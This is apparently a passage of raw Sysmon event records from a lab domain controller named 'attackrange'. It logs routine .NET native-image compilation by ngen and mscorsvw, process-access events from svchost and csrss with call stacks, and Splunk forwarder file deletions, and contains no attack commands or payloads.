23542300x800000000000000019431Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.898{4DB9351A-A14E-60D3-D802-00000000CF01}5708NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\B103MU2MTZ\System.Xml.Serialization.ni.dllMD5=0BEC3186FDBBA99DB073799E2C56F8C3,SHA256=7306E0506D9C83DEBF960646E9F78A2DFCFF683B997DF652BEE880F04AB1EF1E,IMPHASH=00000000000000000000000000000000truetrue
11241100x800000000000000019430Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:06.883{4DB9351A-A14E-60D3-D802-00000000CF01}5708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\164c-0\System.Xml.Serialization.dll2021-06-23 21:02:06.883
10341000x800000000000000019429Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.836{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14E-60D3-D802-00000000CF01}5708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019428Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.804{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A14E-60D3-D802-00000000CF01}5708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
10341000x800000000000000019427Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.804{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14E-60D3-D802-00000000CF01}5708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019426Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.758{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14E-60D3-D702-00000000CF01}4776C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019425Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.758{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A14E-60D3-D702-00000000CF01}4776C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
10341000x800000000000000019424Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.758{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14E-60D3-D702-00000000CF01}4776C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
23542300x800000000000000019423Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.695{4DB9351A-A14E-60D3-D602-00000000CF01}3128NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LT34B5P075\System.Xaml.Hosting.ni.dll.auxMD5=E6D62607E91857B9B7E4E1E94B2430F9,SHA256=793EF573CD8AA241F6A6B06FCC16D5A59986AD7E29449A69B1A98E8F33B1D650,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000019422Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.695{4DB9351A-A14E-60D3-D602-00000000CF01}3128NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LT34B5P075\System.Xaml.Hosting.ni.dllMD5=4C91471BF558E18E3401A8E5360B1926,SHA256=B1A0BFCDFA22A0B52C1344210399BDF47024212E4C5E9035E99D8E096385027D,IMPHASH=00000000000000000000000000000000truetrue
11241100x800000000000000019421Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:06.695{4DB9351A-A14E-60D3-D602-00000000CF01}3128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c38-0\System.Xaml.Hosting.dll2021-06-23 21:02:06.679
23542300x800000000000000019420Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.617{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0B8C3B93009ACBDD5F51CBD22BE1E60,SHA256=9831616A515EF7AB306AA3AFA55D71758D5B495A5EF9E5FFD16D57FB4172E5C7,IMPHASH=00000000000000000000000000000000falsetrue
10341000x800000000000000019419Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:06.617{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14E-60D3-D602-00000000CF01}3128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019418Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.601{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A14E-60D3-D602-00000000CF01}3128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019417Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:06.601{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14E-60D3-D602-00000000CF01}3128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019416Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.523{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14E-60D3-D502-00000000CF01}4152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000019415Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.508{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A14E-60D3-D502-00000000CF01}4152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019414Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.508{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14E-60D3-D502-00000000CF01}4152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019413Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.429{4DB9351A-A14D-60D3-D402-00000000CF01}6632NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JLF666LVDJ\System.WorkflowServices.ni.dll.auxMD5=6BA34B96964F969A6B062E5E64CC9D89,SHA256=2C1B52EAD4E6D4CC30E7BF3B2C25902517F25A983C7EE2F8DCD97A25A8D13C75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019412Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.429{4DB9351A-A14D-60D3-D402-00000000CF01}6632NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JLF666LVDJ\System.WorkflowServices.ni.dllMD5=AE413991E0181FA472F33A8233D00EEB,SHA256=532F6270CDD22480EE70B6A9AD2A18062C59E1A831AD9E5F59DAAFE12C3329A3,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019411Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:06.367{4DB9351A-A14D-60D3-D402-00000000CF01}6632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\19e8-0\System.WorkflowServices.dll2021-06-23 21:02:06.367 10341000x800000000000000019480Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:07.773{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14F-60D3-DD02-00000000CF01}3336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019479Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.758{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A14F-60D3-DD02-00000000CF01}3336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019478Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:07.758{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14F-60D3-DD02-00000000CF01}3336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019477Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.648{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E00425DE3339FB010CC262CFDE52701,SHA256=4C2A559C2774AF6B9A33E193BD15001E8F3B921A7A31F1ED1F0102EFDE212EAC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019476Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:07.601{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14F-60D3-DC02-00000000CF01}6976C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019475Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.586{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A14F-60D3-DC02-00000000CF01}6976C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019474Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:07.586{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14F-60D3-DC02-00000000CF01}6976C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019473Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.539{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E77B7870B9C50325E251AF41C1297EE9,SHA256=EFE0F4637710FC9CF6997BAC35EF5AA3839F61425A0EE24A929A18BDC959FAD8,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000019472Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.523{4DB9351A-A14F-60D3-DB02-00000000CF01}6544NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\CT5DBQT78A\UIAutomationClient.ni.dll.auxMD5=1B04600FE3C4F8E57FBEEEFC3983E933,SHA256=231DD0317EA9B37566B31036BDC812FDA72A1DA8945B0FDD45050FDD6ACEE2B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019471Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.523{4DB9351A-A14F-60D3-DB02-00000000CF01}6544NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\CT5DBQT78A\UIAutomationClient.ni.dllMD5=79BF4ED10FC371DA5B5B4422DA9EE498,SHA256=38B451BB6946FF1E1E3F7940C38A846DFEC6C4BD71961FF8F448ED05496EEFCB,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019470Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:07.523{4DB9351A-A14F-60D3-DB02-00000000CF01}6544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1990-0\UIAutomationClient.dll2021-06-23 21:02:07.523 23542300x800000000000000019469Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.336{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEE94AA3880BF288BF9A5F6E1960C19E,SHA256=68A396540418904DF5EDB8308EA774C26E0BDF5C24E7EB74ED0F0AB4FF670ACF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019468Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
